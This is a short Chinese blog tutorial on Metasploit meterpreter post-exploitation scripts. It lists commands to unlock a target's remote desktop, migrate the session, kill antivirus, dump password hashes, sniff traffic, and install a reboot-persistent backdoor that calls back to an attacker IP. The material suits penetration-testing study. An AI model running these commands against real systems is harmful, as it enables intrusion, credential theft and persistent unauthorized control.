metasploit——(四)使用meterpreter脚本

    通过“run  脚本名字”命令,可以在meterpreter终端中运行扩展脚本。脚本可能会直接运行,也可能提供如何使用的帮助。

  1、run vnc

    在受控系统上运行一个交互式的远程图形化工具,你可以使用VNC协议将受控系统的桌面通信通过隧道方式映射过来,使得你访问到远程的图形化桌面。在某些情况下,受控系统可能是被锁定的,而你无法访问到桌面。。不用担心强大的metasploit能够帮助我们搞定一切: run screen_unlock 命令对目标机器上的桌面进行解锁。。。。同理,run  screen 应该就是对远程桌面进行锁定。。

  2、run  post/windows/manage/migrate

    当我们攻击系统时,常常是对诸如 IE之类的服务器进行漏洞利用,如果目标主机关闭了浏览器,meterpreter会话也将随之被关闭,从而导致与目标系统的连接丢失。。为了避免这个问题,我们可以将meterpreter会话迁移到内存空间中的其他稳定的、不会被关闭的服务进程中,以维持稳定的系统控制连接。。

  3、run  killav

    关闭杀毒软件

   4、run hashdump

    获取系统密码哈希值的副本实施哈希值传递攻击,或是进行哈希值暴力破解还原明文密码。

   5、run  packetrecorder  -i  1

   查看目标机上的所有流量 

  6、run scraper

     获取系统信息

   7、run  persistence  -X  -i  50 -p 443  -r 192.168.1.107

     确保系统重启后meterpreter还能运行。。

·

原文地址:https://www.cnblogs.com/hdsec/p/9522306.html